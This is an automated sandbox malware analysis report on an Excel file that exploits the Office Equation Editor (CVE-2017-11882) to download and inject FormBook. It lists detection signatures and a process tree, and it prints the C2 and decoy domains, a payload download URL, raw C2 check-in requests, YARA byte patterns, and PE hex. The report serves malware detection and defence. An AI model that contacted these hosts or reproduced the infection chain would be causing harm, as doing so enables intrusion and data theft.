Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
W6902.xlsx

Overview

General Information

Sample Name:W6902.xlsx
Analysis ID:562479
MD5:9a0e6f87707210a385ef8ed3bf348de3
SHA1:800a9f004b17cd24413eb98c2f6d9fcd02128887
SHA256:41b58cddca86e32e7034daf8e97dcdaa04ac6cdcb41eae86be1c3fa7fd05c871
Tags:FormbookVelvetSweatshopxlsx
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Injects a PE file into a foreign processes
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Dropped file seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2868 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 1836 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2612 cmdline: "C:\Users\Public\vbc.exe" MD5: C2CA2BA9C38EB02217588662717BA6C3)
      • vbc.exe (PID: 448 cmdline: "C:\Users\Public\vbc.exe" MD5: C2CA2BA9C38EB02217588662717BA6C3)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • msdt.exe (PID: 2556 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: F67A64C46DE10425045AF682802F5BA6)
            • cmd.exe (PID: 2540 cmdline: /c del "C:\Users\Public\vbc.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.dreamschools.online/b80i/"], "decoy": ["yixuan5.com", "jiazheng369.com", "danielleefelipe.net", "micorgas.com", "uvywah.com", "nbjcgl.com", "streets4suites.com", "hempgotas.com", "postmoon.xyz", "gaboshoes.com", "pastodwes.com", "libes.asia", "damusalama.com", "youngliving1.com", "mollyagee.com", "branchwallet.com", "seebuehnegoerlitz.com", "inventors.community", "teentykarm.quest", "927291.com", "wohn-union.info", "rvmservices.com", "cuanquotex.online", "buysubarus.com", "360e.group", "markham.condos", "carriewilliamsinc.com", "ennitec.com", "wildberryhair.com", "trulyrun.com", "pinkandgrey.info", "mnselfservice.com", "gabtomenice.com", "2thpolis.com", "standardcrypro.com", "58lif.com", "ir-hasnol.com", "ggsega.xyz", "tipslowclever.rest", "atlasgrpltdgh.com", "4338agnes.com", "hillsncreeks.com", "pentest.ink", "cevichiles.com", "evodoge.com", "gooooooo.xyz", "ehaszthecarpetbagger.com", "finanes.xyz", "zoharfine.com", "viperiastudios.com", "sjljtzsls.com", "frentags.art", "mediafyagency.com", "faydergayremezdayener.net", "freelance-rse.com", "quickmovecourierservices.com", "lexingtonprochoice.com", "farmacymerchants.com", "inkland-tattoo.com", "aloebiotics.com", "rampi6.com", "bookinggroningen.com", "wilkinsutotint.com", "inslidr.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000000.460837638.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000000.460837638.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000000.460837638.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ae9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bfc:$sqlite3step: 68 34 1C 7B E1
    • 0x16b18:$sqlite3text: 68 38 2A 90 C5
    • 0x16c3d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000002.503935653.0000000000530000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000002.503935653.0000000000530000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 28 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.vbc.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.vbc.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.vbc.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15ce9:$sqlite3step: 68 34 1C 7B E1
        • 0x15dfc:$sqlite3step: 68 34 1C 7B E1
        • 0x15d18:$sqlite3text: 68 38 2A 90 C5
        • 0x15e3d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
        4.2.vbc.exe.4e0000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          4.2.vbc.exe.4e0000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 8 entries

          Sigma Overview

          Exploits

          barindex
          Sigma detected: EQNEDT32.EXE connecting to internet
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 212.192.246.120, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1836, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
          Sigma detected: File Dropped By EQNEDT32EXE
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1836, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gntek[1].exe

          System Summary

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882
          Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1836, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 2612
          Sigma detected: Execution from Suspicious Folder
          Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1836, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 2612
          Source: Process startedAuthor: juju4: Data: Command: C:\Windows\SysWOW64\msdt.exe, CommandLine: C:\Windows\SysWOW64\msdt.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\msdt.exe, NewProcessName: C:\Windows\SysWOW64\msdt.exe, OriginalFileName: C:\Windows\SysWOW64\msdt.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1764, ProcessCommandLine: C:\Windows\SysWOW64\msdt.exe, ProcessId: 2556

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000005.00000000.460837638.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.dreamschools.online/b80i/"], "decoy": ["yixuan5.com", "jiazheng369.com", "danielleefelipe.net", "micorgas.com", "uvywah.com", "nbjcgl.com", "streets4suites.com", "hempgotas.com", "postmoon.xyz", "gaboshoes.com", "pastodwes.com", "libes.asia", "damusalama.com", "youngliving1.com", "mollyagee.com", "branchwallet.com", "seebuehnegoerlitz.com", "inventors.community", "teentykarm.quest", "927291.com", "wohn-union.info", "rvmservices.com", "cuanquotex.online", "buysubarus.com", "360e.group", "markham.condos", "carriewilliamsinc.com", "ennitec.com", "wildberryhair.com", "trulyrun.com", "pinkandgrey.info", "mnselfservice.com", "gabtomenice.com", "2thpolis.com", "standardcrypro.com", "58lif.com", "ir-hasnol.com", "ggsega.xyz", "tipslowclever.rest", "atlasgrpltdgh.com", "4338agnes.com", "hillsncreeks.com", "pentest.ink", "cevichiles.com", "evodoge.com", "gooooooo.xyz", "ehaszthecarpetbagger.com", "finanes.xyz", "zoharfine.com", "viperiastudios.com", "sjljtzsls.com", "frentags.art", "mediafyagency.com", "faydergayremezdayener.net", "freelance-rse.com", "quickmovecourierservices.com", "lexingtonprochoice.com", "farmacymerchants.com", "inkland-tattoo.com", "aloebiotics.com", "rampi6.com", "bookinggroningen.com", "wilkinsutotint.com", "inslidr.com"]}
          Yara detected FormBook
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.4e0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.460837638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.503935653.0000000000530000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.668987103.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.495106003.00000000097E3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.488208515.00000000097E3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.669043733.0000000000220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.463214486.00000000004E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.669096973.0000000000330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.505448080.0000000002380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.503909309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.461534405.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://www.zoharfine.com/b80i/?SZ5TuL=WIyhNSWdz3ksnrxMd9FPgtApU7fAeJTF2OsSNfT/loR2Vp0doC/CWPkVmL0jl9ASIxbbNA==&bZ30xx=0lLLAPA89Avira URL Cloud: Label: malware
          Source: http://www.mollyagee.com/b80i/?SZ5TuL=XkBoiSzcHlsmqFkYMGKyxhKE5R0ucNDlHWw1mrTAF5aGMvlxAg1/o3H+/I9n3Xzt0JsmTA==&bZ30xx=0lLLAPA89Avira URL Cloud: Label: malware
          Source: www.dreamschools.online/b80i/Avira URL Cloud: Label: phishing
          Source: http://www.teentykarm.quest/b80i/?SZ5TuL=J+u8pU8GtC7Crrbw9NxHruIy2NemieD/+UtpUO8UjTwhviPWCSXqrJc4wu/Y5neCzW0Lig==&bZ30xx=0lLLAPA89Avira URL Cloud: Label: malware
          Source: http://www.927291.com/b80i/?SZ5TuL=UugCFIKTrsouekFBGpmjj1lYYuG7Sqq7seOoZgmvymuhpKhoJBysXVQ1tfM8JEdSTWsNrA==&bZ30xx=0lLLAPA89Avira URL Cloud: Label: malware
          Source: http://212.192.246.120/gntek.exeAvira URL Cloud: Label: malware
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gntek[1].exeReversingLabs: Detection: 34%
          Source: C:\Users\user\AppData\Local\Temp\nsjBE61.tmp\npsx.dllReversingLabs: Detection: 46%
          Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 34%
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gntek[1].exeJoe Sandbox ML: detected
          Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
          Source: 7.2.msdt.exe.2b1796c.4.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 5.2.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.vbc.exe.400000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.2.vbc.exe.4e0000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.vbc.exe.400000.4.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 5.0.vbc.exe.400000.1.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 5.0.vbc.exe.400000.0.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 5.0.vbc.exe.400000.3.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 5.0.vbc.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.vbc.exe.400000.7.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.msdt.exe.41fb58.0.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 5.0.vbc.exe.400000.2.unpackAvira: Label: TR/Patched.Ren.Gen2

          Exploits

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000003.462720602.0000000000430000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.504101247.0000000000720000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.504998016.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000003.464331880.0000000000590000.00000004.00000800.00020000.00000000.sdmp, msdt.exe, msdt.exe, 00000007.00000002.669422875.0000000002610000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 00000007.00000003.503886261.0000000002240000.00000004.00000800.00020000.00000000.sdmp, msdt.exe, 00000007.00000002.669567128.0000000002790000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 00000007.00000003.504934771.0000000002480000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: msdt.pdb source: vbc.exe, 00000005.00000002.505482723.0000000002580000.00000040.10000000.00040000.00000000.sdmp, vbc.exe, 00000005.00000003.502497513.0000000002480000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000003.501834417.0000000002380000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00405D7C FindFirstFileA,FindClose,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00402630 FindFirstFileA,
          Source: global trafficDNS query: name: www.927291.com
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 212.192.246.120:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 212.192.246.120:80
          Source: excel.exeMemory has grown: Private usage: 4MB later: 66MB

          Networking

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 1.32.255.137:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 1.32.255.137:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 1.32.255.137:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 194.5.156.29:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 194.5.156.29:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 194.5.156.29:80
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 37.123.118.150 80
          Source: C:\Windows\explorer.exeDomain query: www.mollyagee.com
          Source: C:\Windows\explorer.exeDomain query: www.youngliving1.com
          Source: C:\Windows\explorer.exeNetwork Connect: 1.32.255.137 80
          Source: C:\Windows\explorer.exeDomain query: www.zoharfine.com
          Source: C:\Windows\explorer.exeDomain query: www.teentykarm.quest
          Source: C:\Windows\explorer.exeNetwork Connect: 172.217.168.19 80
          Source: C:\Windows\explorer.exeNetwork Connect: 194.5.156.29 80
          Source: C:\Windows\explorer.exeDomain query: www.927291.com
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.dreamschools.online/b80i/
          Source: Joe Sandbox ViewASN Name: RHC-HOSTINGGB RHC-HOSTINGGB
          Source: Joe Sandbox ViewASN Name: BCPL-SGBGPNETGlobalASNSG BCPL-SGBGPNETGlobalASNSG
          Source: global trafficHTTP traffic detected: GET /b80i/?SZ5TuL=UugCFIKTrsouekFBGpmjj1lYYuG7Sqq7seOoZgmvymuhpKhoJBysXVQ1tfM8JEdSTWsNrA==&bZ30xx=0lLLAPA89 HTTP/1.1Host: www.927291.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b80i/?SZ5TuL=J+u8pU8GtC7Crrbw9NxHruIy2NemieD/+UtpUO8UjTwhviPWCSXqrJc4wu/Y5neCzW0Lig==&bZ30xx=0lLLAPA89 HTTP/1.1Host: www.teentykarm.questConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b80i/?SZ5TuL=WIyhNSWdz3ksnrxMd9FPgtApU7fAeJTF2OsSNfT/loR2Vp0doC/CWPkVmL0jl9ASIxbbNA==&bZ30xx=0lLLAPA89 HTTP/1.1Host: www.zoharfine.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b80i/?SZ5TuL=XkBoiSzcHlsmqFkYMGKyxhKE5R0ucNDlHWw1mrTAF5aGMvlxAg1/o3H+/I9n3Xzt0JsmTA==&bZ30xx=0lLLAPA89 HTTP/1.1Host: www.mollyagee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 1.32.255.137 1.32.255.137
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Fri, 28 Jan 2022 06:21:53 GMTAccept-Ranges: bytesETag: "b7739b57f14d81:0"Server: Microsoft-IIS/10.0Date: Fri, 28 Jan 2022 21:37:20 GMTContent-Length: 254186Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e5 75 4a a8 a1 14 24 fb a1 14 24 fb a1 14 24 fb 2f 1c 7b fb a3 14 24 fb a1 14 25 fb 3a 14 24 fb 22 1c 79 fb b0 14 24 fb f5 37 14 fb a8 14 24 fb 66 12 22 fb a0 14 24 fb 52 69 63 68 a1 14 24 fb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c9 cd ef 48 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5a 00 00 00 d4 01 00 00 04 00 00 25 32 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 d0 02 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 73 00 00 b4 00 00 00 00 c0 02 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 76 59 00 00 00 10 00 00 00 5a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 90 11 00 00 00 70 00 00 00 12 00 00 00 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 af 01 00 00 90 00 00 00 04 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 00 09 00 00 00 c0 02 00 00 0a 00 00 00 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 